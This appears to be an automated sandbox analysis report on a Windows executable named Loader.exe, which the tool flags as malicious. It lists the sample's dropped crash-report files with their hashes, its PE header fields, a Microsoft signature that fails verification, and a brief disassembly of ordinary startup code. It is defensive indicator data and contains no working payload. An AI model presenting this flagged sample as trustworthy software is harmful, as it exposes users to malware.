                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):0.6420461588339392
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:HuF/Duo2aRsUh/e7ifNQXIDcQvc6QcEVcw3cE/3+HbHg/5hZAX/d5FMT2SlPkpXR:O9Uk80BU/QjhzuiF2Z24IO8L
                                                                                                                    MD5:E8A463BF48833983E74E850EA32B40B0
                                                                                                                    SHA1:C761E13B67B80014000582C4EF2B3B4164E6F77A
                                                                                                                    SHA-256:19F14DEA684C722E05B076B8DFBECD7261454C849D169F3F737E9D210AC23C2D
                                                                                                                    SHA-512:6AC14DE3D4051DCA47E1B78F0FD5ADBE8B29458F3F3926C323882193D1B45437CE53E042163230C7EA0CA3D9C9C7A29471731DE4FA0F0B03BF67BF0DD2D120F7
                                                                                                                    Malicious:true
                                                                                                                    Reputation:low
                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.3.8.9.6.1.5.7.8.9.6.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.3.8.9.6.2.0.0.0.8.3.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.8.a.3.c.d.f.-.0.c.7.6.-.4.f.c.a.-.b.f.e.a.-.a.7.3.b.e.3.5.8.4.e.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.7.9.8.3.e.d.-.9.1.5.0.-.4.4.d.6.-.a.3.2.0.-.5.0.e.d.4.e.f.1.d.f.3.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.8.-.0.0.0.1.-.0.0.1.5.-.d.8.3.d.-.b.7.5.8.e.6.1.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.2.2.0.c.a.c.8.c.b.c.f.c.a.5.d.8.8.6.9.f.1.4.9.f.7.b.7.9.e.b.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.0.8.7.d.7.b.1.8.d.9.d.d.3.7.c.b.6.8.f.8.1.1.f.7.2.d.e.6.c.0.d.b.b.b.f.d.3.1.!.L.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Sat Oct 12 20:36:15 2024, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):123820
                                                                                                                    Entropy (8bit):1.9721705128887455
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:L04TkSpfkBvek0yZr2A8zSfbrJGV+vmRs5hc2CKRf7A/C3WpcEZjF:o43pfkBGcwAIE/c+uRsTnfU/WgZ
                                                                                                                    MD5:74B5A867C61D14539A8C9A23354AF0D9
                                                                                                                    SHA1:B24820AFA77085F447ED8EDD1465D55CDA7FBFB1
                                                                                                                    SHA-256:1B7F7E5989C07C480134ABE692EC206AA302CA97DFEDB8173D69D6CB572AAA40
                                                                                                                    SHA-512:869024E692E7156E289B23CD2A8474C209E431DD293C4AD73F39BFBF9DD7181B3744A1B7DE44027A0872D6DD83C5F2E7242E7907C66B9038DF3B486431D5106E
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:MDMP..a..... ..........g....................................l....!......T....K..........`.......8...........T............A.............L"..........8$..............................................................................eJ.......$......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6348
                                                                                                                    Entropy (8bit):3.7031912502298407
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:RSIU6o7wVetb8m66kY/+JPf6SJ55aMQUM89bP3sfy1lm:R6l7wVeJP66kYmJPJpDM89bP3sfy1lm
                                                                                                                    MD5:06CA2785F70E2D8DF872D5689242553A
                                                                                                                    SHA1:04D0AD692F274DD57E3041066B5731603E74E6CF
                                                                                                                    SHA-256:567D9B00070728E8084582BC6BE115D19ADE2071366D74CA80F32D73ABA8D30A
                                                                                                                    SHA-512:7C9AC94D292395A7C7E35024AE785BFF7432D5EEC47A6CCA9BA78BF776FDEBFEDC712E4DADF458A9697C48D96A1F6D2C1FA173FA8E1123FA5A12CDE3151F5523
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.0.0.<./.P.i.
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4670
                                                                                                                    Entropy (8bit):4.425998542330923
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zsQJg77aI9XEWpW8VYMYm8M4J9hFhD+q8v9CudQiwid:uIjfWI7hd7VcJDDKFdlwid
                                                                                                                    MD5:82C8B6CB7283FA26B3B99B5F2985F0A1
                                                                                                                    SHA1:04C7BAD5A94DA6B0D45C16CC6C875031649C07A3
                                                                                                                    SHA-256:B7C26F625BB32191D1DF0EB5D64B6795FE9CB56190C978CB99B826E718E6F60C
                                                                                                                    SHA-512:4503B092BAD166FA6FA1D85FE0BA0BD05DFD1000B9261EA4D73BB8412CF430052433AD1E37AAC03B833F82295BE79DAAFFEF779A023A0B910E9F5422A87B8A9D
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="540698" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Sat Oct 12 20:36:01 2024, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):32954
                                                                                                                    Entropy (8bit):1.7402327385029992
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:PkYvZfmmyO0qEbOJXdkg6bguUGp65J9mWu:/Z90iJX0UGg5JM
                                                                                                                    MD5:83BD6ED4195D03B6BC9147C1364EBAA1
                                                                                                                    SHA1:F43CCD3CA2873EC22DFA35FBF3E5169463DAA3E2
                                                                                                                    SHA-256:DD881A5E2088475923EFA26CF90F2E8F537656ACCC4CCB8393753C74EB961DCD
                                                                                                                    SHA-512:22A598E113D99D4842BBFD2494AAE6F30F828ECE4343C1C501E54CBE52E4623FAF7A3B255BA737E7C9C125F94D31797E1856E28A1982B9D13DA3578577EE58BE
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:MDMP..a..... ..........g........................d...........................T.......8...........T...........(....u......................................................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8274
                                                                                                                    Entropy (8bit):3.6871615268553817
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:R6l7wVeJQc6vS6Y2DESUOgmfEbpr089bKHsfKOm:R6lXJL666YJSUOgmfEHKMfa
                                                                                                                    MD5:4CC77A9E044CD62E31B3090822FBCDB7
                                                                                                                    SHA1:4DBEB2248B7BC5F42DB92D4673BEDEF11849EA02
                                                                                                                    SHA-256:DA0A1359C23A22CC0DE8AFCCD7853F1BB68D122C95C2CD0060F2AD76336B3693
                                                                                                                    SHA-512:9DCB8F046D9BC6F2C6845E044177A24CA1FFC70DC3C65D4D640860893186F38A913E8B9C60521962C9B2E6FAAE01605CE385DEA44E54E180330D0C82247D7470
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.9.6.<./.P.i.
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4555
                                                                                                                    Entropy (8bit):4.436426714247443
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zsQJg77aI9XEWpW8VY0Ym8M4JKmF/+q8e2odQiw5d:uIjfWI7hd7V8JTGodlw5d
                                                                                                                    MD5:5D230DAE5C797B4A21786476519B1D7E
                                                                                                                    SHA1:87FAEC83D0D0BC487DAA6DD6D842D2A60F12DDE9
                                                                                                                    SHA-256:C6B2C77D7E7B7DB269F7AFA637DE7E28125B03B0D80455A426F5AE7BF8414B01
                                                                                                                    SHA-512:10275D990EF998BB5D272AF5608D463A00555ABBA90F3EFC74DC5FB3A3F4390CA1683CBACEABBD49D4A29E96121413537B771A09B66CE566A4C58A0C64320AB2
                                                                                                                    Malicious:false
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="540698" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Sat Oct 12 20:36:12 2024, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):123330
                                                                                                                    Entropy (8bit):1.9647775998473684
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:/kSKFkBve8U0yZr2AkGSfbrJGVXQRP5hImv4/LomMw9E5:/3MkBG8swABE/cXQRPTt40mV9
                                                                                                                    MD5:A648B2726C41C5E73C1CFF9143417346
                                                                                                                    SHA1:26260C46CB206BEAF5E3FBAD74354AD133ADB402
                                                                                                                    SHA-256:A74FBD6C0B8222FE984A954968911D618C3C6AFF2ED08B2F5A77795F9C874955
                                                                                                                    SHA-512:D990A6B98B5634F7C182D2E87FA09D0D6AB8815E349107E26D47BD06D0254A927ED0E735E977F603301C5FCB5D51CC99779BABD34819B2D3FBD16E757A11071A
                                                                                                                    Malicious:false
                                                                                                                    Preview:MDMP..a..... ..........g....................................l....!......D....K..........`.......8...........T...........8A..............L"..........8$..............................................................................eJ.......$......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6298
                                                                                                                    Entropy (8bit):3.712449321588773
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:RSIU6o7wVetb8m36qHYY+JzQZJ55aM4U289b53sf7zm:R6l7wVeJP36SYtJzQ3pr289b53sf7zm
                                                                                                                    MD5:DA786E75231CFCD598ABD14B1335FF58
                                                                                                                    SHA1:2020EFC98C35FBDE46B2D0A2576EC590999CF2B8
                                                                                                                    SHA-256:5FCAB27A650C33BD3C44DCA5C9BDA7AE569D78B99E06DB584C81583B67911941
                                                                                                                    SHA-512:B7FE4473AB1E805DF07C5103DEFAA48F5C443AC5A04675AA821C9A156F36C22894719E34C56FE0DD8DA2C79F9267D7FC8CED7377C3F2AF26A7FFA1AFB89CBE1A
                                                                                                                    Malicious:false
                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.0.0.<./.P.i.
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4569
                                                                                                                    Entropy (8bit):4.438477875068169
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zsQJg77aI9XEWpW8VYFYm8M4J9kFkj+q8cyudQiwid:uIjfWI7hd7VZJFLdlwid
                                                                                                                    MD5:1F60B5DC383C4234F4D611F75C028A71
                                                                                                                    SHA1:EC73AEA41CA55B8849005EE55063ABB3C0DE0E1C
                                                                                                                    SHA-256:8FDB10F2CB1A6DD2F27FE1104D3CCCA5806766F34345E7D2BDA1B420E7EB5DCB
                                                                                                                    SHA-512:C46911928608D3D721D3AEFD28DBC63B78755A4EC6F90EEEA141894476D19311DE0936E6359CC2920D68122181021FA0067560DF94E954CF2EF3898B73833285
                                                                                                                    Malicious:false
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="540698" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1835008
                                                                                                                    Entropy (8bit):4.468552463259391
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:yzZfpi6ceLPx9skLmb0frZWSP3aJG8nAgeiJRMMhA2zX4WABluuNijDH5S:UZHtrZWOKnMM6bFpcj4
                                                                                                                    MD5:0FDB2EEED0DB4B8AE4244BF5F02A38B3
                                                                                                                    SHA1:3099CED2713D09F745479570F717836124AC9EAF
                                                                                                                    SHA-256:4908B6BC4A7FEE1D75EEBDDBC9526996D425A65F2E1A0813D3A56604135E963A
                                                                                                                    SHA-512:57A3927A2EE7366BF949388FB9DFB004E443FD1EBBD48D39EACE261BE51817EE07FC41D0ABCD8C5A3B262775BA454AF2C788B89B6C4DB178766272438D436F06
                                                                                                                    Malicious:false
                                                                                                                    Preview:regfJ...J....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...Y...................................................................................................................................................................................................................................................................................................................................................m........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.7256152523901545
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:Loader.exe
                                                                                                                    File size:581'008 bytes
                                                                                                                    MD5:cb50acc9b951b52306b95eaf8d4e2048
                                                                                                                    SHA1:fd087d7b18d9dd37cb68f811f72de6c0dbbbfd31
                                                                                                                    SHA256:16fd5c981d6da5cbd47293b35b0dd26c756493fe3f88d5613810a2f9b5159b39
                                                                                                                    SHA512:a5c7fe0ddf98a79da2f369c0c104941c1ca626b7a61d0dbdc82853053240a941c4886add3788fed3c6c5fca89ea02ba2e933c5fca6cf44d52dd9eafd02d5af5c
                                                                                                                    SSDEEP:12288:9nd8lywbKG/kz3lLEIfUN0YtUqifN0mCb0LwoMZJRv9qB+9lec8OGY5BA:99wW53lYIfM0fOzoLwoMZJR2+ve717
                                                                                                                    TLSH:C9C4F15275C08073EAB7153102E4DA726E7DB6E10E5069DF63D59FBE0F613C0EA20A6B
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a.............U.......U...,...U.......U.......................................................Rich...........................
                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                    Entrypoint:0x406b1a
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:true
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x6709465D [Fri Oct 11 15:38:05 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:6
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:6
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:6
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:2bf5d9e2e4bbff197e62f5db8f2f3336
                                                                                                                    Signature Valid:false
                                                                                                                    Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                    Error Number:-2146869232
                                                                                                                    Not Before, Not After
                                                                                                                    • 19/10/2023 21:51:12 16/10/2024 21:51:12
                                                                                                                    Subject Chain
                                                                                                                    • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                    Version:3
                                                                                                                    Thumbprint MD5:2169E18183DAF704160A117E905BFDA4
                                                                                                                    Thumbprint SHA-1:CB9C4FBEA1D87D2D468AC5A9CAAB0163F6AD8401
                                                                                                                    Thumbprint SHA-256:C4405F06DFB035F3AD360D29D27D434E004E054B6FB18FA3A5566A9F9AFA8296
                                                                                                                    Serial:3300000557CF90DDC7D1C0888C000000000557
                                                                                                                    Instruction
                                                                                                                    call 00007F41C1A94FC5h
                                                                                                                    jmp 00007F41C1A9450Fh
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                    push esi
                                                                                                                    mov ecx, dword ptr [eax+3Ch]
                                                                                                                    add ecx, eax
                                                                                                                    movzx eax, word ptr [ecx+14h]
                                                                                                                    lea edx, dword ptr [ecx+18h]
                                                                                                                    add edx, eax
                                                                                                                    movzx eax, word ptr [ecx+06h]
                                                                                                                    imul esi, eax, 28h
                                                                                                                    add esi, edx
                                                                                                                    cmp edx, esi
                                                                                                                    je 00007F41C1A946ABh
                                                                                                                    mov ecx, dword ptr [ebp+0Ch]
                                                                                                                    cmp ecx, dword ptr [edx+0Ch]
                                                                                                                    jc 00007F41C1A9469Ch
                                                                                                                    mov eax, dword ptr [edx+08h]
                                                                                                                    add eax, dword ptr [edx+0Ch]
                                                                                                                    cmp ecx, eax
                                                                                                                    jc 00007F41C1A9469Eh
                                                                                                                    add edx, 28h
                                                                                                                    cmp edx, esi
                                                                                                                    jne 00007F41C1A9467Ch
                                                                                                                    xor eax, eax
                                                                                                                    pop esi
                                                                                                                    pop ebp
                                                                                                                    ret
                                                                                                                    mov eax, edx
                                                                                                                    jmp 00007F41C1A9468Bh
                                                                                                                    push esi
                                                                                                                    call 00007F41C1A952CCh
                                                                                                                    test eax, eax
                                                                                                                    je 00007F41C1A946B2h
                                                                                                                    mov eax, dword ptr fs:[00000018h]
                                                                                                                    mov esi, 00484D48h
                                                                                                                    mov edx, dword ptr [eax+04h]
                                                                                                                    jmp 00007F41C1A94696h
                                                                                                                    cmp edx, eax
                                                                                                                    je 00007F41C1A946A2h
                                                                                                                    xor eax, eax
                                                                                                                    mov ecx, edx
                                                                                                                    lock cmpxchg dword ptr [esi], ecx
                                                                                                                    test eax, eax
                                                                                                                    jne 00007F41C1A94682h
                                                                                                                    xor al, al
                                                                                                                    pop esi
                                                                                                                    ret
                                                                                                                    mov al, 01h
                                                                                                                    pop esi
                                                                                                                    ret
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    cmp dword ptr [ebp+08h], 00000000h
                                                                                                                    jne 00007F41C1A94699h
                                                                                                                    mov byte ptr [00484D4Ch], 00000001h
                                                                                                                    call 00007F41C1A94955h
                                                                                                                    call 00007F41C1A9787Fh
                                                                                                                    test al, al
                                                                                                                    jne 00007F41C1A94696h
                                                                                                                    xor al, al
                                                                                                                    pop ebp
                                                                                                                    ret
                                                                                                                    call 00007F41C1AA055Ch
                                                                                                                    test al, al
                                                                                                                    jne 00007F41C1A9469Ch
                                                                                                                    push 00000000h
                                                                                                                    call 00007F41C1A97886h
                                                                                                                    pop ecx
                                                                                                                    jmp 00007F41C1A9467Bh
                                                                                                                    mov al, 01h
                                                                                                                    pop ebp
                                                                                                                    ret
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    cmp byte ptr [00484D4Dh], 00000000h
                                                                                                                    je 00007F41C1A94696h
                                                                                                                    mov al, 01h
                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2c9600x28.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x128.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x88ec80x4ec8
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x1bf0.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x2ac480x1c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
